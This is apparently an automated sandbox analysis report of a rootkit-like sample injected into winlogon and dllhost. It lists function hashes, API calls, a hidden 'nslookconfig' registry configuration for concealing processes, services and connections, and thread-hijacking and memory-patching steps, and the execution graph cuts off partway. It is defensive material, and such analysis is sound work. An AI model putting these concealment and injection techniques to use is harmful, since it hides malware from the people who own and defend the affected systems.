                            Function 0000000140006B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Stringtry_get_function
                            • String ID: LCMapStringEx
                            • API String ID: 2588686239-3893581201
                            • Opcode ID: 87c15fbfbe1f05f64aa5430951cf9ece01d7109a62245abce51aa716bae92111
                            • Instruction ID: 7c7dd02c59062fbcd058de3468e813ba5fe1cfadeba575b480b347c667b96169
                            • Opcode Fuzzy Hash: 87c15fbfbe1f05f64aa5430951cf9ece01d7109a62245abce51aa716bae92111
                            • Instruction Fuzzy Hash: 5611F276608B8086D761CB56B48039AB7A5F7CDBD4F54412AEBCD93B29CF38C5508B00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140003600 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: 94dd1620c46a63ff53a984a68cffc85d02668d10d329063844b3c401576966c7
                            • Instruction ID: d4865f86d63233cf226d7616b7dbd200fe063830735e82a08e6ff91255043838
                            • Opcode Fuzzy Hash: 94dd1620c46a63ff53a984a68cffc85d02668d10d329063844b3c401576966c7
                            • Instruction Fuzzy Hash: 55111C76214B8082EB66CF16F54039977A5F788BD4F588225EF8D17768DF39C5518B00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140006ACC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 539475747-3084827643
                            • Opcode ID: bea0c99d7b61f4679e5d56e735bc41edd173cbad7924a7fb1748e672ffa4f4fd
                            • Instruction ID: f86814be835adc1224f50372284a3323bcf6b4697b5421914438eaaf748fc347
                            • Opcode Fuzzy Hash: bea0c99d7b61f4679e5d56e735bc41edd173cbad7924a7fb1748e672ffa4f4fd
                            • Instruction Fuzzy Hash: D8F058B5714B9092EB06CB53B4407DA3661AB4CBC0F889025FB4927B65CF39C985C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140006A30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Valuetry_get_function
                            • String ID: FlsSetValue
                            • API String ID: 738293619-3750699315
                            • Opcode ID: cc01e7479c4e8cb8aaf6d6675b111d4cd518f7e83ee88a77bed60041685dfe4d
                            • Instruction ID: 854e1f8098dbbf26dcbba5b03f58f1f5fd216598f3386bee41b5debbdfa3cd0a
                            • Opcode Fuzzy Hash: cc01e7479c4e8cb8aaf6d6675b111d4cd518f7e83ee88a77bed60041685dfe4d
                            • Instruction Fuzzy Hash: 02E06DF120468081FB0ADB66F8403D92222A74C7C0F589022FB452B6B5CE39C985C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:1.8%
                            Dynamic/Decrypted Code Coverage:98.4%
                            Signature Coverage:0%
                            Total number of Nodes:365
                            Total number of Limit Nodes:15
                            execution_graph 15382 1afddd03120 15384 1afddd0315c 15382->15384 15383 1afddd031e6 15384->15383 15386 1afddd0a610 15384->15386 15387 1afddd0a641 15386->15387 15388 1afddd0a61d 15386->15388 15390 1afddd0a683 15387->15390 15393 1afddd0a6a2 15387->15393 15388->15387 15389 1afddd0a622 15388->15389 15403 1afddd0c2b8 15389->15403 15392 1afddd0c2b8 _set_errno_from_matherr 8 API calls 15390->15392 15395 1afddd0a688 15392->15395 15396 1afddd0a693 __crtLCMapStringW 15393->15396 15409 1afddd0a528 15393->15409 15398 1afddd0c0dc _invalid_parameter_noinfo 8 API calls 15395->15398 15396->15384 15398->15396 15401 1afddd0c144 16 API calls 15402 1afddd0a6bb 15401->15402 15402->15396 15402->15401 15417 1afddd0bd9c 15403->15417 15405 1afddd0a627 15406 1afddd0c0dc 15405->15406 15604 1afddd0c02c 15406->15604 15408 1afddd0a632 15408->15384 15410 1afddd0a54c 15409->15410 15416 1afddd0a547 15409->15416 15410->15416 15610 1afddd0bc20 15410->15610 15416->15402 15418 1afddd0bdb1 try_get_function 15417->15418 15420 1afddd0bdcb SetLastError 15418->15420 15438 1afddd0c758 15418->15438 15420->15405 15421 1afddd0bde6 15421->15420 15441 1afddd0cb48 15421->15441 15425 1afddd0be17 15428 1afddd0c758 _invalid_parameter_noinfo 3 API calls 15425->15428 15426 1afddd0be07 15427 1afddd0c758 _invalid_parameter_noinfo 3 API calls 15426->15427 15430 1afddd0be0e 15427->15430 15429 1afddd0be1f 15428->15429 15431 1afddd0be23 15429->15431 15432 1afddd0be35 15429->15432 15448 1afddd0cacc 15430->15448 15433 1afddd0c758 _invalid_parameter_noinfo 3 API calls 15431->15433 15453 1afddd0b98c 15432->15453 15433->15430 15458 1afddd0c41c 15438->15458 15440 1afddd0c786 __vcrt_freeptd 15440->15421 15446 1afddd0cb59 _invalid_parameter_noinfo 15441->15446 15442 1afddd0cb8e HeapAlloc 15444 1afddd0bdf9 15442->15444 15442->15446 15443 1afddd0cbaa 15445 1afddd0c2b8 _set_errno_from_matherr 7 API calls 15443->15445 15444->15425 15444->15426 15445->15444 15446->15442 15446->15443 15464 1afddd0a830 15446->15464 15449 1afddd0cad1 HeapFree 15448->15449 15450 1afddd0cb03 15448->15450 15449->15450 15451 1afddd0caec 15449->15451 15450->15420 15452 1afddd0c2b8 _set_errno_from_matherr 7 API calls 15451->15452 15452->15450 15474 1afddd0b864 15453->15474 15460 1afddd0c478 try_get_function 15458->15460 15461 1afddd0c47d try_get_function 15458->15461 15459 1afddd0c4ac LoadLibraryExW 15459->15460 15460->15459 15460->15461 15462 1afddd0c545 FreeLibrary 15460->15462 15463 1afddd0c507 LoadLibraryExW 15460->15463 15461->15440 15462->15460 15463->15460 15467 1afddd0a860 15464->15467 15472 1afddd0c9fc EnterCriticalSection 15467->15472 15473 1afddd141bd 15472->15473 15475 1afddd0c9fc Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 15474->15475 15476 1afddd0b880 15475->15476 15486 1afddd0ca50 LeaveCriticalSection 15476->15486 15487 1afddd14240 15486->15487 15605 1afddd0bd9c _invalid_parameter_noinfo 8 API calls 15604->15605 15606 1afddd0c051 15605->15606 15607 1afddd0c062 15606->15607 15608 1afddd0c02c _invalid_parameter_noinfo 8 API calls 15606->15608 15607->15408 15609 1afddd0c0f5 15608->15609 15609->15408 15611 1afddd0bc35 try_get_function 15610->15611 15612 1afddd0c758 _invalid_parameter_noinfo 3 API calls 15611->15612 15614 1afddd0bc4f SetLastError 15611->15614 15613 1afddd0bc6a 15612->15613 15613->15614 15615 1afddd0cb48 _invalid_parameter_noinfo 8 API calls 15613->15615 15618 1afddd0bcee 15614->15618 15619 1afddd0a567 15614->15619 15617 1afddd0bc7d 15615->15617 15620 1afddd0bc9b 15617->15620 15621 1afddd0bc8b 15617->15621 15643 1afddd0b748 15618->15643 15635 1afddd0c2d8 15619->15635 15625 1afddd0c758 _invalid_parameter_noinfo 3 API calls 15620->15625 15623 1afddd0c758 _invalid_parameter_noinfo 3 API calls 15621->15623 15626 1afddd0bc92 15623->15626 15624 1afddd0bcf3 15627 1afddd0bca3 15625->15627 15631 1afddd0cacc __free_lconv_mon 8 API calls 15626->15631 15628 1afddd0bca7 15627->15628 15629 1afddd0bcb9 15627->15629 15632 1afddd0c758 _invalid_parameter_noinfo 3 API calls 15628->15632 15630 1afddd0b98c _invalid_parameter_noinfo 8 API calls 15629->15630 15633 1afddd0bcc1 15630->15633 15631->15614 15632->15626 15634 1afddd0cacc __free_lconv_mon 8 API calls 15633->15634 15634->15614 15636 1afddd0a58a 15635->15636 15637 1afddd0c2ed 15635->15637 15639 1afddd0c30c 15636->15639 15637->15636 15707 1afddd0f714 15637->15707 15640 1afddd0c321 15639->15640 15641 1afddd0c334 15639->15641 15640->15641 15723 1afddd0df44 15640->15723 15641->15416 15652 1afddd0e904 15643->15652 15646 1afddd0b760 15648 1afddd0b769 IsProcessorFeaturePresent 15646->15648 15651 1afddd0b793 15646->15651 15649 1afddd0b778 15648->15649 15678 1afddd0bec8 15649->15678 15651->15624 15686 1afddd0e8bc 15652->15686 15655 1afddd0e954 15656 1afddd0e97c 15655->15656 15657 1afddd0e99d 15655->15657 15656->15657 15658 1afddd0bd9c _invalid_parameter_noinfo 8 API calls 15656->15658 15660 1afddd0e990 15656->15660 15659 1afddd0c9fc Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 15657->15659 15662 1afddd0ea74 15657->15662 15658->15660 15659->15662 15660->15657 15661 1afddd0ea1a 15660->15661 15670 1afddd0e9da 15660->15670 15663 1afddd0c2b8 _set_errno_from_matherr 8 API calls 15661->15663 15664 1afddd0eba7 15662->15664 15671 1afddd0eaa4 15662->15671 15675 1afddd0eae5 15662->15675 15665 1afddd0ea1f 15663->15665 15666 1afddd0ebb4 15664->15666 15669 1afddd0ca50 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 15664->15669 15667 1afddd0c0dc _invalid_parameter_noinfo 8 API calls 15665->15667 15667->15670 15668 1afddd0ca50 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 15676 1afddd0eb44 15668->15676 15669->15666 15670->15646 15672 1afddd0bc20 15 API calls 15671->15672 15671->15675 15673 1afddd0ead5 15672->15673 15674 1afddd0bc20 15 API calls 15673->15674 15674->15675 15675->15668 15675->15676 15677 1afddd0bc20 15 API calls 15676->15677 15677->15676 15679 1afddd0bf02 capture_previous_context __scrt_fastfail 15678->15679 15680 1afddd0bf47 RtlLookupFunctionEntry 15679->15680 15681 1afddd0bf64 capture_previous_context 15680->15681 15682 1afddd0bf9a IsDebuggerPresent 15680->15682 15681->15682 15684 1afddd0bfdd __scrt_fastfail 15682->15684 15691 1afddd083e0 15684->15691 15687 1afddd0c9fc Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 15686->15687 15688 1afddd0e8d5 15687->15688 15689 1afddd0ca50 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 15688->15689 15690 1afddd0b751 15689->15690 15690->15646 15690->15655 15692 1afddd083ea 15691->15692 15693 1afddd083f6 15692->15693 15694 1afddd08484 IsProcessorFeaturePresent 15692->15694 15693->15651 15695 1afddd0849b 15694->15695 15700 1afddd08678 15695->15700 15703 1afddd08689 capture_previous_context 15700->15703 15701 1afddd08692 RtlLookupFunctionEntry 15702 1afddd084ae 15701->15702 15701->15703 15704 1afddd08450 15702->15704 15703->15701 15703->15702 15705 1afddd08461 __scrt_fastfail __report_securityfailure 15704->15705 15706 1afddd08470 TerminateProcess 15705->15706 15708 1afddd0bc20 15 API calls 15707->15708 15709 1afddd0f723 15708->15709 15710 1afddd0f76c 15709->15710 15711 1afddd0c9fc Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 15709->15711 15710->15636 15712 1afddd0f74a 15711->15712 15719 1afddd0f780 15712->15719 15715 1afddd0ca50 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 15716 1afddd0f767 15715->15716 15716->15710 15717 1afddd0b748 15 API calls 15716->15717 15718 1afddd0f77f 15717->15718 15720 1afddd0f792 Concurrency::details::SchedulerProxy::DeleteThis 15719->15720 15722 1afddd0f75a 15719->15722 15721 1afddd0f46c Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 15720->15721 15720->15722 15721->15722 15722->15715 15724 1afddd0bc20 15 API calls 15723->15724 15725 1afddd0df4d 15724->15725 15726 1afddd01ed0 15732 1afddd01400 15726->15732 15728 1afddd01edb 15729 1afddd01ee2 Sleep SleepEx 15728->15729 15803 1afddd01810 15728->15803 15788 1afddd019f0 15729->15788 15845 1afddd0840c 15732->15845 15735 1afddd0840c 4 API calls 15736 1afddd01451 15735->15736 15737 1afddd0840c 4 API calls 15736->15737 15738 1afddd01486 15737->15738 15739 1afddd0840c 4 API calls 15738->15739 15740 1afddd014ae 15739->15740 15741 1afddd0840c 4 API calls 15740->15741 15742 1afddd014e2 15741->15742 15743 1afddd0840c 4 API calls 15742->15743 15744 1afddd01516 15743->15744 15745 1afddd0840c 4 API calls 15744->15745 15746 1afddd0154a 15745->15746 15747 1afddd0840c 4 API calls 15746->15747 15748 1afddd01572 15747->15748 15749 1afddd0840c 4 API calls 15748->15749 15750 1afddd0159a 15749->15750 15751 1afddd015b2 RegOpenKeyExW 15750->15751 15752 1afddd017e1 15751->15752 15753 1afddd015e8 RegOpenKeyExW 15751->15753 15756 1afddd083e0 _handle_error 3 API calls 15752->15756 15754 1afddd0160f 15753->15754 15755 1afddd01625 RegOpenKeyExW 15753->15755 15860 1afddd011c0 RegQueryInfoKeyW 15754->15860 15759 1afddd01663 RegOpenKeyExW 15755->15759 15760 1afddd0164c 15755->15760 15758 1afddd017f0 15756->15758 15758->15728 15763 1afddd016a1 RegOpenKeyExW 15759->15763 15764 1afddd0168a 15759->15764 15851 1afddd01000 RegQueryInfoKeyW 15760->15851 15766 1afddd016df RegOpenKeyExW 15763->15766 15767 1afddd016c8 15763->15767 15765 1afddd011c0 18 API calls 15764->15765 15769 1afddd01697 RegCloseKey 15765->15769 15771 1afddd01706 15766->15771 15772 1afddd0171d RegOpenKeyExW 15766->15772 15770 1afddd011c0 18 API calls 15767->15770 15769->15763 15773 1afddd016d5 RegCloseKey 15770->15773 15774 1afddd011c0 18 API calls 15771->15774 15775 1afddd01744 15772->15775 15776 1afddd0175b RegOpenKeyExW 15772->15776 15773->15766 15777 1afddd01713 RegCloseKey 15774->15777 15778 1afddd01000 14 API calls 15775->15778 15779 1afddd01782 15776->15779 15780 1afddd01799 RegOpenKeyExW 15776->15780 15777->15772 15784 1afddd01751 RegCloseKey 15778->15784 15781 1afddd01000 14 API calls 15779->15781 15782 1afddd017c0 15780->15782 15783 1afddd017d7 RegCloseKey 15780->15783 15785 1afddd0178f RegCloseKey 15781->15785 15786 1afddd01000 14 API calls 15782->15786 15783->15752 15784->15776 15785->15780 15787 1afddd017cd RegCloseKey 15786->15787 15787->15783 15789 1afddd01a09 15788->15789 15791 1afddd01a18 15788->15791 15789->15728 15790 1afddd01c8a 15790->15728 15791->15790 15792 1afddd01a8c lstrcmpW 15791->15792 15793 1afddd01a72 lstrcmpiW 15791->15793 15795 1afddd01ab2 15791->15795 15792->15791 15793->15791 15794 1afddd01b64 lstrcmpW 15794->15795 15795->15790 15795->15794 15797 1afddd01b4a lstrcmpiW 15795->15797 15799 1afddd01b8a 15795->15799 15796 1afddd01c0a 15796->15790 15800 1afddd01c64 lstrcmpW 15796->15800 15802 1afddd01c4a lstrcmpiW 15796->15802 15797->15795 15798 1afddd01be4 lstrcmpW 15798->15799 15799->15790 15799->15796 15799->15798 15801 1afddd01bca lstrcmpiW 15799->15801 15800->15796 15801->15799 15802->15796 15804 1afddd01833 15803->15804 15805 1afddd01855 15803->15805 15804->15805 15807 1afddd08404 9 API calls 15804->15807 15806 1afddd08404 9 API calls 15805->15806 15808 1afddd0185e 15806->15808 15807->15804 15809 1afddd08404 9 API calls 15808->15809 15810 1afddd01875 15809->15810 15811 1afddd08404 9 API calls 15810->15811 15812 1afddd01882 15811->15812 15813 1afddd08404 9 API calls 15812->15813 15814 1afddd01895 15813->15814 15815 1afddd018b5 15814->15815 15818 1afddd08404 9 API calls 15814->15818 15816 1afddd08404 9 API calls 15815->15816 15817 1afddd018be 15816->15817 15819 1afddd08404 9 API calls 15817->15819 15818->15814 15824 1afddd018d5 15819->15824 15820 1afddd018f5 15821 1afddd08404 9 API calls 15820->15821 15823 1afddd018fe 15821->15823 15822 1afddd08404 9 API calls 15822->15824 15825 1afddd08404 9 API calls 15823->15825 15824->15820 15824->15822 15826 1afddd01915 15825->15826 15827 1afddd01933 15826->15827 15829 1afddd08404 9 API calls 15826->15829 15828 1afddd08404 9 API calls 15827->15828 15830 1afddd0193c 15828->15830 15829->15826 15831 1afddd08404 9 API calls 15830->15831 15832 1afddd01953 15831->15832 15833 1afddd08404 9 API calls 15832->15833 15834 1afddd01960 15833->15834 15835 1afddd08404 9 API calls 15834->15835 15836 1afddd01973 15835->15836 15837 1afddd08404 9 API calls 15836->15837 15838 1afddd01980 15837->15838 15839 1afddd08404 9 API calls 15838->15839 15840 1afddd01993 15839->15840 15841 1afddd08404 9 API calls 15840->15841 15842 1afddd019a0 15841->15842 15843 1afddd08404 9 API calls 15842->15843 15844 1afddd019b3 15843->15844 15848 1afddd08417 15845->15848 15846 1afddd01432 15846->15735 15847 1afddd0a830 _invalid_parameter_noinfo 2 API calls 15847->15848 15848->15845 15848->15846 15848->15847 15873 1afddd08c14 15848->15873 15877 1afddd08c34 15848->15877 15852 1afddd01195 15851->15852 15853 1afddd0106e 15851->15853 15855 1afddd083e0 _handle_error 3 API calls 15852->15855 15853->15852 15854 1afddd01084 15853->15854 15856 1afddd010a0 RegEnumValueW 15854->15856 15858 1afddd0117d 15854->15858 15886 1afddd08404 15854->15886 15857 1afddd011ad RegCloseKey 15855->15857 15856->15854 15857->15759 15858->15852 15861 1afddd013c8 15860->15861 15865 1afddd0122e 15860->15865 15862 1afddd083e0 _handle_error 3 API calls 15861->15862 15863 1afddd013e8 RegCloseKey 15862->15863 15863->15755 15864 1afddd013b0 15867 1afddd08404 9 API calls 15864->15867 15865->15864 15866 1afddd01270 RegEnumValueW 15865->15866 15868 1afddd01360 lstrlenW 15865->15868 15869 1afddd012f6 lstrcmpiW 15865->15869 15870 1afddd012fe lstrcmpW 15865->15870 15871 1afddd01382 lstrcpyW 15865->15871 15872 1afddd08404 9 API calls 15865->15872 15866->15865 15867->15861 15868->15865 15869->15865 15870->15865 15871->15865 15872->15868 15874 1afddd08c22 std::bad_alloc::bad_alloc 15873->15874 15881 1afddd09ce4 15874->15881 15876 1afddd08c33 15878 1afddd08c42 std::bad_alloc::bad_alloc 15877->15878 15879 1afddd09ce4 Concurrency::cancel_current_task 2 API calls 15878->15879 15880 1afddd08c53 15879->15880 15880->15848 15882 1afddd09d20 RtlPcToFileHeader 15881->15882 15884 1afddd09d03 15881->15884 15883 1afddd09d47 RaiseException 15882->15883 15885 1afddd09d38 15882->15885 15883->15876 15884->15882 15885->15883 15887 1afddd08ac8 15886->15887 15888 1afddd0cad1 HeapFree 15887->15888 15889 1afddd0cb03 15887->15889 15888->15889 15890 1afddd0caec 15888->15890 15889->15854 15891 1afddd0c2b8 _set_errno_from_matherr 8 API calls 15890->15891 15891->15889 15892 1afddd06c00 15893 1afddd06c0d 15892->15893 15894 1afddd06c19 15893->15894 15901 1afddd06d2a 15893->15901 15895 1afddd06c4e 15894->15895 15896 1afddd06c9d 15894->15896 15897 1afddd06c76 SetThreadContext 15895->15897 15897->15896 15898 1afddd06d51 VirtualProtect FlushInstructionCache 15898->15901 15899 1afddd06e0e 15900 1afddd06e2e 15899->15900 15916 1afddd052f0 15899->15916 15912 1afddd05d00 GetCurrentProcess 15900->15912 15901->15898 15901->15899 15903 1afddd08404 9 API calls 15901->15903 15903->15901 15905 1afddd06e33 15906 1afddd06e87 15905->15906 15907 1afddd06e47 ResumeThread 15905->15907 15910 1afddd083e0 _handle_error 3 API calls 15906->15910 15908 1afddd08404 9 API calls 15907->15908 15909 1afddd06e7b 15908->15909 15909->15905 15911 1afddd06ecf 15910->15911 15913 1afddd05d1c 15912->15913 15914 1afddd05d32 VirtualProtect FlushInstructionCache 15913->15914 15915 1afddd05d63 15913->15915 15914->15913 15915->15905 15919 1afddd0530c 15916->15919 15917 1afddd0536f 15917->15900 15918 1afddd05322 VirtualFree 15918->15919 15919->15917 15919->15918 15920 1afddd049c9 15921 1afddd04916 __scrt_fastfail 15920->15921 15922 1afddd04966 VirtualQuery 15921->15922 15923 1afddd04980 15921->15923 15924 1afddd0499a VirtualAlloc 15921->15924 15922->15921 15922->15923 15924->15923 15925 1afddd049cb GetLastError 15924->15925 15925->15921 15926 1afddcd35d0 15927 1afddcd35f4 15926->15927 15928 1afddcd3653 VirtualAlloc 15927->15928 15931 1afddcd37ba 15927->15931 15930 1afddcd3678 15928->15930 15928->15931 15929 1afddcd3740 LoadLibraryA 15929->15930 15930->15929 15930->15931 15932 1afddd0645d 15933 1afddd06464 15932->15933 15934 1afddd064cb 15933->15934 15935 1afddd06547 VirtualProtect 15933->15935 15936 1afddd06581 15935->15936 15937 1afddd06573 GetLastError 15935->15937 15937->15936

                            Executed Functions

                            Function 000001AFDDD01400 Relevance: 47.5, APIs: 18, Strings: 9, Instructions: 240registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: CloseOpen$Concurrency::cancel_current_taskEnumInfoQueryValuelstrcmpilstrlen
                            • String ID: SOFTWARE\nslookconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                            • API String ID: 2205723969-4286660177
                            • Opcode ID: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction ID: 8c2aaf5fa55622d345902602c6cf8af45a2de01cd9d8aa887a80494d114403f5
                            • Opcode Fuzzy Hash: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction Fuzzy Hash: 8DC15872712B11C6EB11DFE2E8503AD77B8F789B88F018029DA8947B99DF78C45AC741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD03F20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: CurrentFileModuleNameProcessProtectVirtual$CreateFindHandlePathThread_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 2570614652-925916808
                            • Opcode ID: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction ID: 5ecd2b039eb19bca009c9e3db2dca814974c2c340eda80d35b49e607686de3bf
                            • Opcode Fuzzy Hash: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction Fuzzy Hash: 30416F7174774181FF669BE1F8447A626A9E786B48F04403DD949467D8EF3DC00E9742
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD06A40 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 100 1afddd06a40-1afddd06a67 101 1afddd06a69-1afddd06a78 100->101 102 1afddd06a7b-1afddd06a86 GetCurrentThreadId 100->102 101->102 103 1afddd06a92-1afddd06a99 102->103 104 1afddd06a88-1afddd06a8d 102->104 106 1afddd06aab-1afddd06abf 103->106 107 1afddd06a9b-1afddd06aa6 call 1afddd06870 103->107 105 1afddd06ebf-1afddd06ed6 call 1afddd083e0 104->105 108 1afddd06ace-1afddd06ad4 106->108 107->105 112 1afddd06ba5-1afddd06bc6 108->112 113 1afddd06ada-1afddd06ae3 108->113 119 1afddd06d2f-1afddd06d40 call 1afddd0476f 112->119 120 1afddd06bcc-1afddd06bec GetThreadContext 112->120 116 1afddd06ae5-1afddd06b28 call 1afddd09480 113->116 117 1afddd06b2a-1afddd06b9d call 1afddd05420 call 1afddd053c0 call 1afddd05380 113->117 128 1afddd06ba0 116->128 117->128 132 1afddd06d45-1afddd06d4b 119->132 124 1afddd06bf2-1afddd06c13 120->124 125 1afddd06d2a 120->125 124->125 133 1afddd06c19-1afddd06c22 124->133 125->119 128->108 135 1afddd06d51-1afddd06da8 VirtualProtect FlushInstructionCache 132->135 136 1afddd06e0e-1afddd06e1e 132->136 137 1afddd06ca2-1afddd06cb3 133->137 138 1afddd06c24-1afddd06c35 133->138 142 1afddd06dd9-1afddd06e09 call 1afddd08404 135->142 143 1afddd06daa-1afddd06db4 135->143 140 1afddd06e20-1afddd06e27 136->140 141 1afddd06e2e-1afddd06e3a call 1afddd05d00 136->141 144 1afddd06d25 137->144 145 1afddd06cb5-1afddd06cd3 137->145 146 1afddd06c37-1afddd06c4c 138->146 147 1afddd06c9d 138->147 140->141 149 1afddd06e29 call 1afddd052f0 140->149 162 1afddd06e3f-1afddd06e45 141->162 142->132 143->142 151 1afddd06db6-1afddd06dd1 call 1afddd052a0 143->151 145->144 153 1afddd06cd5-1afddd06d1c call 1afddd04810 145->153 146->147 154 1afddd06c4e-1afddd06c98 call 1afddd04880 SetThreadContext 146->154 147->144 149->141 151->142 153->144 165 1afddd06d20 call 1afddd1343d 153->165 154->147 166 1afddd06e87-1afddd06ea5 162->166 167 1afddd06e47-1afddd06e85 ResumeThread call 1afddd08404 162->167 165->144 169 1afddd06ea7-1afddd06eb6 166->169 170 1afddd06eb9 166->170 167->162 169->170 170->105
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Thread$Current$Context
                            • String ID:
                            • API String ID: 1666949209-0
                            • Opcode ID: 1dc33039a22eabbeebcab3339823ceb6ead82d8cbd5b34bc2700be86ad712db4
                            • Instruction ID: 88e4d1ff00525c66c1d13cf890266a8f114de126a86606a9f95001ab7e93b2fa
                            • Opcode Fuzzy Hash: 1dc33039a22eabbeebcab3339823ceb6ead82d8cbd5b34bc2700be86ad712db4
                            • Instruction Fuzzy Hash: 1BD1EE76306B8882DF71DB95E4913AA77A4F3C9B88F10412AEA8D477A5CF3CC549DB01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD05FE0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 172 1afddd05fe0-1afddd0600c 173 1afddd0601d-1afddd06026 172->173 174 1afddd0600e-1afddd06016 172->174 175 1afddd06037-1afddd06040 173->175 176 1afddd06028-1afddd06030 173->176 174->173 177 1afddd06051-1afddd0605a 175->177 178 1afddd06042-1afddd0604a 175->178 176->175 179 1afddd06066-1afddd06071 GetCurrentThreadId 177->179 180 1afddd0605c-1afddd06061 177->180 178->177 182 1afddd06073-1afddd06078 179->182 183 1afddd0607d-1afddd06084 179->183 181 1afddd065e3-1afddd065ea 180->181 182->181 184 1afddd06091-1afddd0609a 183->184 185 1afddd06086-1afddd0608c 183->185 186 1afddd060a6-1afddd060b2 184->186 187 1afddd0609c-1afddd060a1 184->187 185->181 188 1afddd060b4-1afddd060d9 186->188 189 1afddd060de-1afddd06135 call 1afddd065f0 * 2 186->189 187->181 188->181 194 1afddd06137-1afddd0613e 189->194 195 1afddd0614a-1afddd06153 189->195 196 1afddd06140 194->196 197 1afddd06146 194->197 198 1afddd06165-1afddd0616e 195->198 199 1afddd06155-1afddd06162 195->199 202 1afddd061c0-1afddd061c6 196->202 197->195 203 1afddd061b6-1afddd061ba 197->203 200 1afddd06170-1afddd06180 198->200 201 1afddd06183-1afddd061a8 call 1afddd0840c 198->201 199->198 200->201 212 1afddd0623d-1afddd06252 call 1afddd04bd0 201->212 213 1afddd061ae 201->213 204 1afddd061f5-1afddd061fb 202->204 205 1afddd061c8-1afddd061e4 call 1afddd052a0 202->205 203->202 209 1afddd06225-1afddd06238 204->209 210 1afddd061fd-1afddd0621c call 1afddd08404 204->210 205->204 215 1afddd061e6-1afddd061ee 205->215 209->181 210->209 219 1afddd06261-1afddd0626a 212->219 220 1afddd06254-1afddd0625c 212->220 213->203 215->204 221 1afddd0627c-1afddd062ca call 1afddd09890 219->221 222 1afddd0626c-1afddd06279 219->222 220->203 225 1afddd062d2-1afddd062da 221->225 222->221 226 1afddd062e0-1afddd063cb call 1afddd08350 225->226 227 1afddd063e7-1afddd063ef 225->227 238 1afddd063cf-1afddd063de call 1afddd04f70 226->238 239 1afddd063cd 226->239 229 